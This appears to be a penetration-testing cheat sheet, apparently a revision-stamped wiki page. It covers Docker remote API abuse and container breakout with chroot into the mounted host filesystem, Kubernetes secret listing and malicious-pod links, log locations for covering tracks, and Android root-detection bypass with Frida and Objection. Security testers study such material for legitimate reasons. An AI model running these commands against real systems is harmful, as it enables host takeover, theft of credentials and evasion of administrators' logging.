2020-09-23 16:51:41 +00:00
### Closing Session (Windows)
* quser
* logoff id|user_name
2020-10-09 12:19:57 +00:00
2021-07-20 22:28:17 +00:00
# LDAP
```
ldapsearch -x -LLL -h localhost -D 'cn=USER,ou=users,dc=domain,dc=com' -w PASSWORD -b "dc=domain,dc
=com"
```
2021-02-17 11:27:39 +00:00
2020-12-11 17:07:42 +00:00
# Covering Track
11.11. Covering our Tracks
The final stages of penetration testing involve setting up persistence and covering our tracks. For today's material, we'll detail the later as this is not mentioned nearly enough.
During a pentesting engagement, you will want to try to avoid detection from the administrators & engineers of your client wherever within the permitted scope. Activities such as logging in, authentication and uploading/downloading files are logged by services and the system itself.
On Debian and Ubuntu, the majority of these are left within the "/var/log directory and often require administrative privileges to read and modify. Some log files of interest:
"/var/log/auth.log" (Attempted logins for SSH, changes too or logging in as system users:)
2021-11-11 10:22:30 +00:00
< img src = "https://imgur.com/37aTxnI.png" / >
2020-12-11 17:07:42 +00:00
"/var/log/syslog" (System events such as firewall alerts:)
2021-11-11 10:22:30 +00:00
< img src = "https://imgur.com/k7scyUP.png" / >
2020-12-11 17:07:42 +00:00
"/var/log/< service / "
For example, the access logs of apache2
/var/log/apache2/access.log
2021-11-11 10:22:30 +00:00
< img src = "https://imgur.com/y8Rin3h.png" / >
2020-12-11 17:07:42 +00:00
2021-02-17 11:27:39 +00:00
# Docker
To see list of conatiner/images on a remote machine < br / >
`docker -H <ip>:2375 images`
To see list of currently running images/conatiner on a remote machine < br / >
`docker -H <ip>:2375 ps -a ` < br />
To start a container from a remote machine < br / >
`docker -H <ip>:2375 exec -it <container-id> /bin/sh` < br />
To start a container from a remote machine using name and tags< br / >
`docker -H <ip>:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh` < br />
2021-03-26 10:20:18 +00:00
Break out of docker container< br / >
`docker -H tcp://<ip>:2375 run --rm -it -v /:/host <container_name> chroot /host bash` < br />
If docker.sock is on conatiner , upload static docker binary< br / >
`./docker -H unix:///var/run/docker.sock images` < br />
`./docker -H unix:///var/run/docker.sock run -it -v /:/host/ wordpress chroot /host` < br />
2021-05-01 00:01:32 +00:00
2021-11-11 10:22:30 +00:00
Remove docker images
`docker rmi $(docker images -q)` < br />
Remove docker containers
`docker stop $(docker ps -a)` < br />
2021-05-01 00:01:32 +00:00
## Docker Breakout/Exploits
* If we have a privilege docker and we can run command `fdisk -l` and view storage on the machine then we can mount the host file system < br />
`mount /dev/sda<x> /mnt/host`
* We can look for container capabilites on docker with `capsh --print` and exploit it SYS_MODULE
https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
* There's another exploit realted to docker (CVE-2019-5736)
https://github.com/Frichetten/CVE-2019-5736-PoC
2021-08-10 10:21:03 +00:00
# Kubernetes
## Basic Commands
### To get information of all pods which
`kubectl get pods`
### To get infromation of namespaces which organize clusters
`kubectl get namespaces`
### Get information of pods from a sepecfic namespace
`kubectl get pods -n namespace`
### Get secrets
`kubectl get secrets -n kube-system`
### Get information of secrets
`kubectl describe secret <secret_name> -n <namespace_name>`
### Get information of pod
`kubectl get -o json pod <pod_name> -n <namespace_name>`
## Creating Malicious Pods
https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf
https://github.com/BishopFox/badPods
2022-01-08 15:38:51 +00:00
# Android
2022-01-28 08:03:06 +00:00
## Using ADB
ADB (Android Debuggable Bridge) allows to conneect to android devices through command line and allows to execute shell commands
If there is only one device connected or using `Genymotion` then use
```
adb shell
```
Or if there are multiple devices connected then first run `adb devices` to note the device ID and connect with `-s`
```
adb -s DEVICE_ID shell
```
To install apks through adb
```
adb install file.apk
```
To transfer data to device
```
adb push file /data/local/tmp
```
2022-01-08 15:38:51 +00:00
## Root Detection Bypass
2022-01-28 08:03:06 +00:00
Some applications won't run on rooted devices but it can be bypassed using either frida , objection , Xposed/EdXposed modules (unrootbeer , Rootcloak) or using Magisk
### Using Frida
There are number of scripts available to bypass root detection , there's a universal script (https://codeshare.frida.re/@dzonerzy/fridantiroot/) that can bypass root detection but it's unstable , a better version is available here (https://gist.github.com/pich4ya/0b2a8592d3c8d5df9c34b8d185d2ea35)
First run frida server on the device then run frida through windows or linux
```
frida --codeshare dzonerzy/fridantiroot -f com.packagename -U
```
### Objection
Objection can also be used to bypass root detection if scripts fail , thus also works with frida
```
objection --gadget com.android.packagename explore
```
To list activities in the application
```
android hooking list activities
```
To list methods with return type from an activity
```
android hooking list class_methods android_packagename.activity_name
```
## Logging
Sometimes application might be logging the input so we can capture it through running `logcat`
## Data stored on storage
Data saved by android application can be accssed through `/data/data/package_name`
2022-01-08 15:38:51 +00:00
## SSL Pinning
2022-01-28 08:03:06 +00:00
## Intents
## Remote Code Execution
2021-08-10 10:21:03 +00:00